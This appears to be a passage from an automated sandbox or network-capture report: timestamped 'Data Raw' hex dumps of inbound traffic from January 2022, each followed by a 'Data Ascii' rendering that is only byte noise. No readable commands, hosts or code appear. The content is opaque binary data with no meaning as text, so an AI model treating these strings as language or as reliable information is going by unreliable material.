                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5630INData Raw: 92 db 98 bf 72 4b c2 c5 d5 b4 0f 8d b3 27 ba db 03 8d b3 4d 84 ec b9 0b a1 58 f4 b5 19 a5 ed ee 3f 69 8d 01 6b 64 17 c1 0b a7 b9 ed ac 56 9c 5d ab c5 26 48 98 c7 36 bf ee a5 8e 75 21 e7 7e a4 73 df 39 9f 6f b0 bd de f5 8d 35 2a 84 c2 cf 2f 1d 5c f7 13 30 b0 03 94 90 e1 4f 45 e9 7d 5d bd 46 31 d7 fb 7a 3d 0f 00 d4 d1 98 45 5f f3 e9 1c 54 d0 31 44 b9 45 94 46 b8 fc 91 ca 9b d7 8f 2f e4 0a 6d 53 88 db c1 f5 1b 1b 0a c0 b2 1c f8 7e a7 82 9e 11 7f 38 8a 8a bd 70 cd d5 73 6e db af 07 de b2 27 04 56 22 d5 72 ad 63 4b a5 1c 7e 33 4b 7e 40 97 1b 1b ec c4 95 2b f9 03 e3 84 63 aa 73 b7 d7 55 e4 5b fc 3c 55 e6 8d 9a 35 c1 98 d2 07 5a ca 93 18 ba 42 45 7c 2c ce 7c ca 4e 97 36 60 22 0e a2 90 18 cc ea ca 9d 60 3b 6b f7 38 1d 18 0f b9 50 ba 5a a3 62 03 04 10 80 68 8a ef
                                                                                                                                                                                                    Data Ascii: rK'MX?ikdV]&H6u!~s9o5*/\0OE}]F1z=E_T1DEF/mS~8psn'V"rcK~3K~@+csU[<U5ZBE|,|N6`"`;k8PZbh
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5646INData Raw: 85 49 f2 c4 31 32 18 72 90 e8 5e f0 25 a1 4b 78 25 12 63 3b 86 41 31 d5 f9 bf 59 c3 c6 66 be 0f ea 64 8d d5 e2 36 71 b3 d2 16 bd be 0e 81 db 1c 81 16 37 53 e3 5e 87 23 eb 1b 40 6f fc a9 ff a1 b2 24 cb 6d a5 b4 a0 9e ac 5f f7 21 f0 18 a1 0e 43 dd 39 f5 ac ce b8 1f 17 67 7f 14 43 90 47 22 57 5b 5f 1c ec b6 2e e7 90 50 e9 2c 3d b5 89 0a 8b c5 3c 33 71 c0 a9 2a b0 3b 1a d7 12 3a 70 b0 73 ec 75 02 04 ed ad f0 07 01 ae 13 bc 8e 6f 62 e5 c9 52 c3 31 73 5a 76 29 1e 4d a4 f8 3a 70 d9 11 65 57 44 2f a6 11 ab c5 d5 16 af 0b b0 36 fa ed f8 9d 6e 3a b7 83 66 9b 5d 7e 3f 5c 24 1c a2 18 89 12 f3 c4 c6 99 6c fe a7 79 00 cb 86 b8 18 eb fd 7d 29 fa a3 42 1e 94 3d e1 10 0c 35 5b 5c ca 9f 63 22 ff b4 0e 26 de d9 bb 94 dd 2f b0 43 d6 82 31 2c c1 0c a0 91 26 e5 2a 67 b4 c5 27
                                                                                                                                                                                                    Data Ascii: I12r^%Kx%c;A1Yfd6q7S^#@o$m_!C9gCG"W[_.P,=<3q*;:psuobR1sZv)M:peWD/6n:f]~?\$ly})B=5[\c"&/C1,&*g'
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5662INData Raw: 9e 97 73 17 ad a7 3b 95 9b 2a bd 75 5f b6 96 58 dc e8 8a 34 6e 41 bc b1 7d e6 31 ff dc 61 5f e6 b0 9d c2 90 cb c8 b0 d0 77 63 bf d2 58 00 22 03 8b f8 b8 36 d1 d1 08 cf 1c 88 28 e7 6a d3 3b 3f 9c 2d d3 b2 e9 a9 12 8a 72 21 2d 94 2e 6e 14 15 59 5f e8 98 9a 78 85 25 4b d0 62 ab 45 97 56 ad f3 19 ec 2a 7f c7 ed e9 5e 80 eb de 85 a8 5d 20 e1 45 be 9c b2 ec 95 97 a4 c4 50 dd 2a 2f 91 68 a4 6d cd 93 3f 72 22 77 50 70 2e aa 7b 11 5f 76 fb 04 14 a2 05 9e be ca 18 fc 9b cb de 89 ea 1a fa 1b d3 cb 03 e5 ef 2e e8 af 2d 38 9b 93 56 8d 32 44 c9 7a 97 46 2b 1d e3 44 54 31 87 74 af 79 2d c0 c3 23 1c 70 5b f1 a2 06 e6 b8 a1 97 4d 0c f4 e0 39 c7 c9 d0 a7 76 9a c4 7c 6f db 4a 65 d6 69 f1 e7 e7 09 ee 9d 6b e1 12 14 2c 34 4d 06 d7 82 90 de c8 46 50 2f 7c 76 14 98 bb 2a bd 41
                                                                                                                                                                                                    Data Ascii: s;*u_X4nA}1a_wcX"6(j;?-r!-.nY_x%KbEV*^] EP*/hm?r"wPp.{_v.-8V2DzF+DT1ty-#p[M9v|oJeik,4MFP/|v*A
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5678INData Raw: 3a dd ab 66 e6 81 f7 ff e2 1e 80 b3 18 8a 54 06 fe a6 ce 8d 42 ac 70 a0 7c 7b 79 fd 95 17 e5 92 3a 23 4c 82 66 46 38 93 00 61 22 02 9a f6 61 55 82 55 7e c9 8d 6b a4 a4 6a 39 cb 60 db 9e bb 09 ec 88 83 a7 2d b5 c8 59 cd a0 f4 a2 44 94 be ab 04 14 3f cf 4c e5 fd 85 65 ce 50 81 1d f4 85 e7 1f 1c 5c d3 8c 7e 97 18 13 7e a2 a2 f2 1e fd 10 5d 70 f7 bb 56 13 f6 78 89 91 1f 68 e5 40 6b 0b 6b 40 99 ae a3 bc 75 57 94 75 5a de 54 bd a5 0b 2e 15 a9 cc b6 d1 4e a1 42 0f 8d 40 84 22 88 00 d0 63 b3 1c 10 f4 f8 cf 6c 69 b2 84 4e e0 a2 1f 0b f3 f1 b9 5d 5c b1 10 35 44 fc 23 06 f7 96 8e 37 6d 7c 19 cb af f0 e2 0b 1c 44 c3 93 d9 eb 0a eb df 76 f0 3f f1 25 8d c7 f1 2f c2 87 0e d8 89 a8 24 bf de ec 03 48 be 04 96 8a 07 63 3e 7d 88 3d bf b8 c0 e2 13 0a c3 bd 13 d0 20 92 80 b7
                                                                                                                                                                                                    Data Ascii: :fTBp|{y:#LfF8a"aUU~kj9`-YD?LeP\~~]pVxh@kk@uWuZT.NB@"cliN]\5D#7m|Dv?%/$Hc>}=
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5694INData Raw: ac 39 69 cd b9 bd ab d4 56 a9 23 6c f1 84 08 43 b1 36 02 28 79 f8 a2 1b a0 43 2f 40 46 62 55 1b 9b 89 50 b5 da 9f 83 db bb f6 14 f3 5e 18 32 f3 c4 dc 0e b8 6c 77 c4 81 50 55 bd 4f cf 7e fc dd 16 ee 2c 86 71 8a 0b ce 5e 0a e7 bb fd 48 44 5d 6c a3 58 2c 2e f0 66 50 15 b9 46 4c 1f 4e e0 f9 9b a2 82 02 fd 3e a7 ab b2 96 c1 08 b3 dd 60 f4 52 83 01 4c 23 63 41 d8 aa 3b f4 14 1f d3 62 77 5d e8 ab c2 1a 09 1c 6f 97 76 d7 b0 44 80 98 33 da 47 f1 0d 95 6a 0a 19 28 61 52 c8 06 e5 48 73 ce 12 6b e5 22 cb 2a c1 83 c4 44 f7 84 96 fc f9 3f 66 29 ee 4e 30 61 02 74 8d f8 4c cc b4 70 17 82 aa 96 bb 13 f1 2f 7e 24 18 23 7b 10 09 f2 23 97 09 84 8a 0d dd 9a 9c 95 79 64 1f 38 13 40 ed 5e b5 e6 df 27 84 35 3f 06 38 5a 31 81 69 6e c9 3d 45 dc 4e 5d b4 44 8f bb 4c f9 01 f2 32 6d
                                                                                                                                                                                                    Data Ascii: 9iV#lC6(yC/@FbUP^2lwPUO~,q^HD]lX,.fPFLN>`RL#cA;bw]ovD3Gj(aRHsk"*D?f)N0atLp/~$#{#yd8@^'5?8Z1in=EN]DL2m
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5710INData Raw: a7 85 91 11 ec 03 1c 66 0a c9 d3 39 ba 8b f2 73 ea 56 7d 6b 7f ae f9 03 3a 32 c0 65 19 ca 48 7d 4d 8c 2a ba 79 b2 b0 d4 c7 6e 34 06 df f3 08 9b 9f 94 53 9a ca 84 33 1d cb e0 a0 1c 8d 5e fe 42 b8 2f 92 03 40 0e 36 f7 66 ae 17 a2 ea d0 5c e9 43 dc d4 2e 1f 8f 5e 29 a4 34 45 9b 5d ad aa 20 26 57 2e 5f cb 99 63 b4 72 19 ec 57 ab 85 44 23 84 6a 78 31 ae 89 ee 5c 0f 24 0d 6b 54 83 f3 e0 16 20 cf fd 6c e2 f6 7d 26 9c fe 5a 5c 9f b5 0b a0 64 e6 3f d0 86 69 9f bf 88 a7 4b 73 98 be f5 a2 68 7c 0b 5c 95 c3 83 08 8e e6 ae 9a fc 85 f2 de 33 f0 35 3d 55 37 9c 46 d4 b7 6b 00 07 b9 e1 c0 d6 ec cb 78 d2 1b 16 ce 03 55 63 86 cd 34 99 28 f4 70 2a 0f 8d 30 62 0e 2d 7b a1 c0 17 6f 57 3b 14 f8 c4 07 f4 9b 66 7c a0 e0 0c cc 6e 3a 88 0d 6b e9 db 94 38 fc b0 ad ab ba 5c 48 dd cb
                                                                                                                                                                                                    Data Ascii: f9sV}k:2eH}M*yn4S3^B/@6f\C.^)4E] &W._crWD#jx1\$kT l}&Z\d?iKsh|\35=U7FkxUc4(p*0b-{oW;f|n:k8\H
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5726INData Raw: 3a 67 28 4e 22 9d c3 db 9d fc bd c3 3c 81 7a fe 6a 47 d5 bc b5 46 29 c7 0a bc b4 d2 e4 d5 06 54 77 7a 08 38 c0 88 4d 07 1f 83 bf 5e d6 d6 ae c5 04 37 af 0d 81 42 6b ef 98 99 b8 8e 94 ce d8 a7 b2 61 f7 b7 9c 9f 73 19 68 41 f3 1a da c7 0a 02 f8 2e 02 48 4f 0b 27 13 ec 9f 85 81 3a ec 37 18 f9 43 b6 7e c8 78 f1 ea c7 85 d6 b5 57 72 80 c6 22 e0 47 a8 5c c8 c7 1b 8a 8b f3 71 ec 8b 59 0e df 56 7c 5d dd c2 e8 2f e7 e4 61 68 de c0 a1 aa 1d 78 28 7d 7b 68 0b 66 7d 7f 77 45 94 5b d0 ab de 44 4d 3c 77 cc de fe 82 6f 86 78 9d a4 5f ab 1c 19 fa b5 88 c6 95 77 05 ba 38 20 e0 76 35 7b ce 18 7e 49 60 ed 32 85 90 5f 72 e6 50 73 8f d8 9b 9e 6d 0c 9d e6 72 30 27 c6 6d c5 d6 0e 97 80 3f 4a 1d e5 5b b9 17 17 df e7 5e 4c 80 a8 fc f2 e6 62 99 9d 6e 3c 70 d7 5b d2 b0 d7 8c b9 26
                                                                                                                                                                                                    Data Ascii: :g(N"<zjGF)Twz8M^7BkashA.HO':7C~xWr"G\qYV|]/ahx(}{hf}wE[DM<wox_w8 v5{~I`2_rPsmr0'm?J[^Lbn<p[&
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5742INData Raw: 06 39 85 21 59 86 9e a3 15 3d 25 33 b6 56 49 e1 47 35 cd 92 e3 15 ac 40 be 81 c4 f3 2a 9a c9 09 aa de e1 74 a8 c0 2f bd fe a7 62 50 5d e3 7a d5 bd 90 e2 8d 6f b2 1b 51 75 ee cb a5 6e bc c5 87 88 f3 79 9d 43 fd 1d 80 80 fd 5d ef b7 70 f3 e4 f0 cb af 8e 85 19 7c d8 56 56 34 52 10 1f 5e 68 3b 35 86 65 94 55 53 d7 ea 8c 85 b4 eb 89 be 83 c1 c8 d2 e5 e2 af 48 7a 91 47 52 92 8e 54 bd a1 ee 33 1b eb 3b 31 cc 66 e3 f1 91 8e 72 0b 7f bb 48 55 2e 2d 1e ef 7f 63 43 1b 13 23 32 47 f7 c6 31 d3 6b 69 a8 6b b4 27 16 ba d8 d0 a0 81 7d 0e 89 a2 b8 7a 5a 6d 92 c5 2b 2e f1 4d ef fb f4 4f 8d 87 10 eb 5b 39 c0 a8 b9 bb 2b 07 16 19 2a de 45 db f8 ca a4 e3 5f 25 ac 5e 3d b1 18 25 6a 6c e3 c9 a0 6a 42 ab f8 59 f5 70 fa 5d 4b fa 67 15 b1 cb ba c2 a4 5f 91 3e da 08 30 3a 4c 62 f8
                                                                                                                                                                                                    Data Ascii: 9!Y=%3VIG5@*t/bP]zoQunyC]p|VV4R^h;5eUSHzGRT3;1frHU.-cC#2G1kik'}zZm+.MO[9+*E_%^=%jljBYp]Kg_>0:Lb
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5758INData Raw: 43 93 b8 d8 9d f6 f6 a3 06 03 28 17 37 f7 01 42 c5 20 54 05 7a aa b8 89 d8 7b e5 4d 61 2d f5 85 38 b6 16 a2 73 f8 ca b7 9e ec ba ec 41 74 26 e1 57 b5 3f 1a c3 05 03 a4 c1 a3 3f df 48 b7 e1 70 d8 b2 48 26 cc 86 8e 85 99 16 d6 c7 4c fc b7 23 ab 5d 1f 79 29 ea d3 bc e7 e1 e9 fb c8 c4 73 f0 33 81 d1 eb 93 b3 9c 16 7b 4b 8f 1b d5 0e 1c 58 20 b5 1f 27 90 cd ff 89 5b 96 43 c3 10 ec a0 64 c4 05 b0 94 30 74 50 69 85 f9 1a 27 06 58 b4 76 74 02 c9 0b 99 67 52 97 e6 07 60 e8 83 50 c2 04 35 f0 b1 ea f3 87 34 0e 2b ff 82 7c 7e 8c 9e 31 dd a0 8d e4 e6 35 1f 0e 3b c6 bc 8c 60 a1 62 1a fa 49 4f 64 b9 af 52 72 3a e3 a3 62 ae 71 8f f5 49 19 f9 cd 52 aa e4 06 a1 9b 41 65 9c 93 cf 5b a7 b5 b1 01 ca 21 ff 6f f8 8e 23 a3 83 e0 89 0a df b8 d6 a0 66 1e 8a 12 23 4d 37 60 96 03 1a
                                                                                                                                                                                                    Data Ascii: C(7B Tz{Ma-8sAt&W??HpH&L#]y)s3{KX '[Cd0tPi'XvtgR`P54+|~15;`bIOdRr:bqIRAe[!o#f#M7`
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5774INData Raw: b5 fa 91 8c 90 22 68 42 8c 74 10 74 e2 81 67 66 4e 2b 27 aa 68 32 e9 47 7a c7 8a 99 4d 4f 32 35 64 9b a0 11 d7 9a 7f cb 8c fc ca 32 f0 b0 34 a1 30 fb 39 16 e3 c8 7c 9c e2 c2 30 6e 65 7e 3d 29 12 68 b6 59 4e 21 4f ad 24 2d ac ea bf 89 13 71 ae d1 7b 18 71 43 05 55 8d 79 eb 6b a2 28 97 d5 16 14 26 27 38 3f 6b a2 00 19 82 7f 0f 7b fc e0 3b b5 c1 52 54 18 ec 63 a5 75 78 5f 6f 38 b3 32 1f ce ba ab df 45 40 fa a7 2a dc 0e 9b 12 22 d2 fd f5 3a f1 15 32 84 d8 5a 54 fe 48 1f 30 56 a0 24 1d a8 f8 78 ad ae c0 2a 5d aa 21 bf d3 9a c6 c4 8b 9c aa f2 09 15 60 cf a9 10 f9 8a d4 e5 b0 27 32 34 b7 2e 00 dc 55 fa 7e 18 d2 b7 79 af 75 fa b9 ad 59 3e 29 07 42 6c 60 e4 d4 c9 8f f3 42 1d ea c0 fd 70 25 6a 19 fa 4a fe 93 87 4b 82 e3 04 a6 5c f1 4d 1f d4 12 9c fd f4 76 4f 0a bb
                                                                                                                                                                                                    Data Ascii: "hBttgfN+'h2GzMO25d2409|0ne~=)hYN!O$-q{qCUyk(&'8?k{;RTcux_o82E@*":2ZTH0V$x*]!`'24.U~yuY>)Bl`Bp%jJK\MvO
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5790INData Raw: e6 f2 80 65 75 02 e9 8c 9a 8e b1 1c 45 54 bd 16 8f 22 8f 23 28 13 ca c6 fe 6d 16 4b d9 6b df cd f0 b8 2f 47 23 8a bf ea d7 65 9c 9a 3f eb 10 de 01 d0 96 82 a7 e8 7c c8 cf e8 ab ac f0 b2 f6 f5 d5 8b f6 9b 41 f9 79 df 19 90 75 e1 3f 88 ac 5f 1a 73 c7 85 b0 4a 43 64 7c 32 ec 23 24 a6 8e 5c 9d f3 ae 48 37 f5 9c 27 cf 83 d8 a2 80 5f 5c 36 e5 78 44 e9 f3 03 e9 27 43 3f 48 d0 ac b5 26 1e 7a a0 e8 10 81 99 d9 bf 7a 9f d9 b1 df 2b 05 f1 da d9 17 9f 49 e6 e1 a9 6d 98 76 11 46 5a ec c3 c5 40 42 3a 9e 7f dd 01 33 6d 5e e5 78 16 52 65 1e ad 57 cc b2 d1 aa 73 03 4f 51 fc 2f de 81 0b 4c 7a 11 ce 22 46 9c 8c b2 35 86 bb d0 1a ea 6f cc f5 34 67 1d a3 3e 21 b3 c2 69 1a 41 07 66 24 cb a5 0e 72 9c 89 b2 d6 9d 8f a1 7f 13 9d 71 10 3b 23 c2 79 e7 5b 18 cf d2 c7 b3 33 bb 0a be
                                                                                                                                                                                                    Data Ascii: euET"#(mKk/G#e?|Ayu?_sJCd|2#$\H7'_\6xD'C?H&zz+ImvFZ@B:3m^xReWsOQ/Lz"F5o4g>!iAf$rq;#y[3
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5806INData Raw: e1 4a 3b 54 0b 3c d6 6a 72 99 f2 c8 9a 19 4e ea 48 bb 0d ab 4c 72 02 b5 4c b2 a5 36 ef e9 06 37 1d b4 c1 f8 2a 80 d7 86 8d 05 d6 12 cc 66 d5 fd a4 37 dc 04 fa 38 52 65 fd 1b 30 88 4f 22 14 fa c2 31 82 e1 89 e6 53 f4 e7 f3 85 89 37 01 7f 89 cf 7a 51 ce 98 ee 2e 38 79 d0 47 dd 37 a5 b0 2d f2 ae 6d 73 bd 80 cd 73 b2 cb fc 82 cc 84 a9 6d ed f0 4d 37 eb d3 dc 5f aa df fc 47 ce 6f fe 50 9b 44 b5 55 18 13 74 c9 3e 58 6a a3 56 b4 01 af 7d 8b e0 fd 35 92 c0 0e d3 eb 08 b6 32 28 6d 9b 49 a4 e0 17 f5 58 2a 5b c8 31 53 1d 94 40 47 a4 8c 38 83 7b b0 4e 9f 9c cf c3 56 51 12 b5 ac f7 69 e2 ac cd 63 c5 64 3e 4a a3 11 57 d7 1e 84 10 43 7f 35 9c ae 6c 62 f4 73 40 f5 4c d0 fb b9 2f 4e 43 9b f3 f8 0d e7 c2 9a 02 68 ab b5 9f f0 09 ea 07 91 ac 49 ec a9 c3 d1 0f 5a 5f 50 ae 34
                                                                                                                                                                                                    Data Ascii: J;T<jrNHLrL67*f78Re0O"1S7zQ.8yG7-mssmM7_GoPDUt>XjV}52(mIX*[1S@G8{NVQicd>JWC5lbs@L/NChIZ_P4
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5822INData Raw: 8c 5c ad 04 31 b2 87 a4 57 1f f5 1c 65 60 85 a3 d1 f2 72 41 4f d7 6d b8 a7 8f 34 a0 a5 b8 08 6a b2 38 21 1a ee bc 24 ed 98 17 56 6f 12 ca a1 5a 32 e3 17 9e 80 a9 d4 13 ae 8b 8e e9 57 43 1b 9e 13 bb f9 00 1b d5 16 ac c5 ab 1c f7 6f e8 82 1e 96 26 53 d4 f8 d8 e7 4c d8 91 3f 6e ec 8a a5 e5 69 b3 3f a7 2f 85 cf cc d5 1d cb 65 f9 3e 67 9c 2e e2 01 52 91 1f dd 4f 82 c2 3c 56 70 ff 96 b7 07 61 06 ee 76 01 46 d8 9c 91 48 38 a7 a3 54 4a 2d 64 ab 32 a5 89 a9 ef a2 50 e1 4f 6c 54 fb 99 2d 6a 6a 1a e1 df b0 3d 05 cd c2 5a 3f c2 ee 03 9e 67 99 9c f4 8d 99 e8 4e 20 d7 33 56 51 6c 93 63 be c9 0f 06 d9 18 bd af 80 f9 6b e5 7c 0a 99 ca 07 22 25 94 66 b9 57 77 0c 73 5d c2 d0 23 fc 54 03 88 71 70 5a 88 bd bd dc b6 9b f2 94 fa 02 ee 0b 88 f8 cc f3 82 96 53 95 4e 96 b4 c9 72
                                                                                                                                                                                                    Data Ascii: \1We`rAOm4j8!$VoZ2WCo&SL?ni?/e>g.RO<VpavFH8TJ-d2POlT-jj=Z?gN 3VQlck|"%fWws]#TqpZSNr
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5838INData Raw: 7f c4 9c 0f 2f 68 f0 ae b2 2e c8 82 0f 72 15 b4 77 dd b5 50 11 8f c2 9c 2a f5 1d 42 68 07 7b 38 f3 83 3d e6 97 b0 84 15 31 9f c0 4d 44 a9 49 0c ec 34 68 5b 8f 18 c2 c5 e4 f4 62 3c b7 ce b1 b0 05 bf 4f 01 87 ba d3 f5 f4 61 5a 0f 0d 07 dd 65 6b 11 49 4b 5f a9 6f a8 ee d5 07 85 5e 0d 40 c7 14 13 31 3b bf 55 6f 46 ab 75 d6 c2 b0 a6 ef f2 17 4e 01 84 36 b9 9a 00 b6 b7 3b f3 d0 5d 03 9c 43 22 62 f2 d8 e5 43 fd da e4 fc ee 97 59 bb 19 65 40 52 ca c8 e4 a3 4d 4b 93 2d 78 97 c8 19 ca 7e 15 78 47 ff 2f e1 d7 e5 60 3b 7e f0 0f 8c 90 9a 34 f2 4f 29 2b 09 ea c8 ab a9 84 bd b0 2d 7e 61 bf d4 3f 18 de 6f a6 c3 aa 1f 33 e6 aa 2d 34 6d 60 3f 79 db ba b8 a9 61 56 6c 7e 41 5e 12 c0 1d a7 d6 5b 57 2f f9 cc 6f bd ee e5 d5 6e 76 99 bd ab fe 26 d1 a5 80 b0 bb cb fa 7b 5e 48 a9
                                                                                                                                                                                                    Data Ascii: /h.rwP*Bh{8=1MDI4h[b<OaZekIK_o^@1;UoFuN6;]C"bCYe@RMK-x~xG/`;~4O)+-~a?o3-4m`?yaVl~A^[W/onv&{^H
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5854INData Raw: a5 13 49 c2 b9 74 10 fe 75 d1 d1 27 53 93 81 f0 55 48 bc a8 d2 3d 73 f4 2c 93 3f 24 6c 8a 75 ce 38 6e c5 86 d7 a6 12 47 cf 57 12 89 e0 77 e1 bf 15 a9 4d 8e eb d8 9d ca c0 4f 51 e9 32 35 b6 dd 11 df b6 87 fe 5a 26 e1 0f e1 73 87 0d 35 f7 d3 f8 99 8b 8b 6f 7d f5 3e 4d 92 13 66 60 3d e1 ee 15 6a d1 d9 8b 33 f9 96 c9 f9 57 5d 5c 35 9a 53 22 56 42 33 4c d5 61 86 c2 80 5d 88 ec 80 46 09 71 75 fd d0 00 43 05 e9 43 56 f9 79 0b 7b 2a 4b 8a 28 b9 18 2b 0a a9 e7 34 58 08 49 f5 d9 3e 51 dc 5c 4b 02 aa 1d 9b da 03 3c ef 26 7c d6 53 ad 6e 8f 2a b2 29 b1 8a 71 b5 f4 f7 6f 8d 3d 0d 58 09 be 66 a8 a7 4f da 88 e1 36 3e b9 cc e1 9a 7b a9 a5 fe bf c7 d5 0a 4a a3 58 34 fe 97 e5 b5 ab 1b 43 c4 96 7e 48 cf 83 de a0 f1 ed c9 9a 4f 9f 7c 0f 71 be d9 47 17 1b f5 24 db a9 6b 12 f5
                                                                                                                                                                                                    Data Ascii: Itu'SUH=s,?$lu8nGWwMOQ25Z&s5o}>Mf`=j3W]\5S"VB3La]FquCCVy{*K(+4XI>Q\K<&|Sn*)qo=XfO6>{JX4C~HO|qG$k
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5870INData Raw: f3 c3 1a 9c 63 bd 39 11 ef 08 79 b0 b9 59 18 57 62 4e e4 29 39 d0 bf 1a 69 72 12 ef 42 4f bc 54 99 f1 ac 2d d0 72 d8 9c 1f 41 11 71 89 90 0b 7d cf c2 34 2d 98 32 2d f3 1a 38 c2 47 92 50 0f c3 6c 22 95 a9 ac b7 00 ac cb c8 82 11 89 82 d3 52 81 a1 a7 07 ee cd 7a 3b ab f2 22 e3 d1 49 61 d1 0f 30 8d af 1d 02 5d 6d 00 71 75 e7 b3 8d 75 85 f6 fd ca 20 af 49 da e6 76 80 2b 28 96 3e da d6 6c d4 a4 e3 be 68 17 c0 9d d8 06 59 07 5a 4b 04 8f ed 37 b0 6a 9d c8 08 fb 87 1d 52 98 da bb 65 24 66 29 6c 8e 58 be 0f 1d 33 a7 6a 14 dc 11 91 12 a1 4b e6 04 89 ea 65 bb 0d 0b c8 32 b9 de 07 d9 fd 94 09 36 ed a7 59 2d 03 c1 44 49 b7 d9 bd 6c 0a a6 f6 93 de 4b af bd a1 00 a6 bd 1b be ee 0b 1a eb 12 24 4e bd 0a 4d 85 05 72 7d e0 c6 19 fe ab d7 2e b2 ae 70 f2 22 ac 8e 45 a2 15 88
                                                                                                                                                                                                    Data Ascii: c9yYWbN)9irBOT-rAq}4-2-8GPl"Rz;"Ia0]mquu Iv+(>lhYZK7jRe$f)lX3jKe26Y-DIlK$NMr}.p"E
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5886INData Raw: a2 ae bc 7a cf 8b 17 9d 1e f8 3f 9c 8f a9 94 08 9a 2e a0 d5 b5 56 1d d2 62 94 12 ff 3c 79 1d 91 95 26 f4 08 92 c1 f2 50 57 89 cb 96 00 a6 e2 eb 09 72 f0 9f 55 60 54 ab 95 61 e2 82 15 f8 6a e0 d8 32 f2 42 3e 14 ec f8 ef 1e 5e d2 4b 12 b6 b2 80 61 6f 4d b0 a6 83 8e 7b fa c8 15 1d b6 cc 36 ca d2 61 7b 44 d3 83 ad 51 1c f6 2d 48 44 51 5b ae fc 89 f2 eb 6b b3 22 4c 3b d4 34 7a f0 e5 0c 6a 7c 10 02 d1 36 82 8c 64 ae 24 69 dd cb 99 83 10 7c a8 f1 43 4b 48 fd 62 b8 8e 76 5e b6 ff 34 f6 e8 08 97 b2 3b 69 0b 60 8d 18 f7 be 86 15 1e f2 77 d5 0b d7 2b 40 53 17 e7 3b 21 7a 4a b7 25 19 84 55 77 e7 5a 8b 11 08 6b ea b1 aa 6a 70 22 01 90 41 36 91 34 7c 66 d3 dc 1e a7 c7 7a 3c 71 92 28 c2 32 48 a8 aa 9f 8c b6 0c c4 3f 88 f8 7a 05 14 05 02 a7 bf 36 5b aa a1 b5 c5 c6 1b dc
                                                                                                                                                                                                    Data Ascii: z?.Vb<y&PWrU`Taj2B>^KaoM{6a{DQ-HDQ[k"L;4zj|6d$i|CKHbv^4;i`w+@S;!zJ%UwZkjp"A64|fz<q(2H?z6[
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5902INData Raw: ff bd 09 5f e8 d6 36 5a b4 e4 92 ee d0 23 bc 94 7b cd ad 3c 7f 6f ca 38 5b 20 5d cf cf e4 f3 b7 e3 83 be 43 6b 8c 37 77 93 10 f4 19 ad eb 69 30 e8 46 6c 8c 0d a9 49 81 50 d5 6b 70 0f ac 30 a7 79 e3 54 ba cb fb 46 48 16 ec c1 11 e4 f6 9f d7 e9 b8 65 e2 bf 68 f4 40 ab a2 37 07 86 fe 24 e6 a4 74 0d 39 48 8e 04 08 27 b1 ce 73 ce 05 44 3e 82 23 1a f8 fe 01 b0 bd 54 2c de 06 2a 4c 30 e0 c5 eb b2 2c 20 f0 df a9 cb d9 8a 9c a1 21 60 22 3f 6d f5 f2 36 df d3 41 a6 63 25 49 f2 bf 1b 86 c9 43 1d 36 5a 3a 91 d8 2e ec 27 1d 3b 52 4b c4 f5 99 39 17 43 b0 0a b6 86 3c 86 8c 2e 1e 2d 41 c3 46 b7 5f 8c 48 4a 93 3a 4b 94 f7 e5 00 95 15 f0 05 f5 47 37 55 b5 61 88 75 9c 61 aa 14 33 78 46 a5 3f 69 2d fa f4 50 d9 a5 36 11 d9 e8 c8 0e 83 9f 6d 79 88 16 a2 fa 2b f0 5e 82 fe 71 91
                                                                                                                                                                                                    Data Ascii: _6Z#{<o8[ ]Ck7wi0FlIPkp0yTFHeh@7$t9H'sD>#T,*L0, !`"?m6Ac%IC6Z:.';RK9C<.-AF_HJ:KG7Uaua3xF?i-P6my+^q
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5918INData Raw: 29 de 12 e3 ae 3e 52 e8 9b ed d7 a3 5b ec c5 f7 4b 8f 05 05 16 d7 c7 da a5 b0 8c 99 36 5b be c8 5b e5 9c 8e 9f 54 57 56 e9 7f f3 b8 04 e4 c4 cf 0c 29 7a 9b 5f 35 f7 bd 08 56 07 ab 96 e1 60 af af 41 3a 8a 5f 35 d5 2d 3b b3 77 69 8d 58 7c e4 78 9c 2b 91 c5 02 48 71 27 d3 09 0e 8e b9 27 91 75 68 b8 b9 e5 21 f3 e9 b7 c9 2a 79 55 53 4d a7 58 2a e2 45 07 85 a7 e2 3d b7 96 e8 a5 5d 3f 39 31 df c9 90 02 68 ae 6e aa 2c 6c a6 1f 4b 7a 7c fd 69 db cf c4 0e a9 65 9b 05 6f 03 38 42 00 15 4e 83 f8 0b 79 38 60 c3 52 25 17 c5 fa 2d f9 72 83 ef bb 6f a1 dc 9e d3 a6 65 58 94 b0 11 89 e0 10 a0 21 ae d5 e3 47 d2 c6 29 d2 c6 33 17 f3 53 7e 4a 86 92 b8 af 2f 48 fd bf 9e 5b 51 5d eb 60 62 a7 ad ce d2 e5 d0 67 34 0b 07 87 fb 6e 18 a2 33 a4 4e 8e b0 1b 42 2c 6f 6f fe 73 3f 6c b4
                                                                                                                                                                                                    Data Ascii: )>R[K6[[TWV)z_5V`A:_5-;wiX|x+Hq''uh!*yUSMX*E=]?91hn,lKz|ieo8BNy8`R%-roeX!G)3S~J/H[Q]`bg4n3NB,oos?l
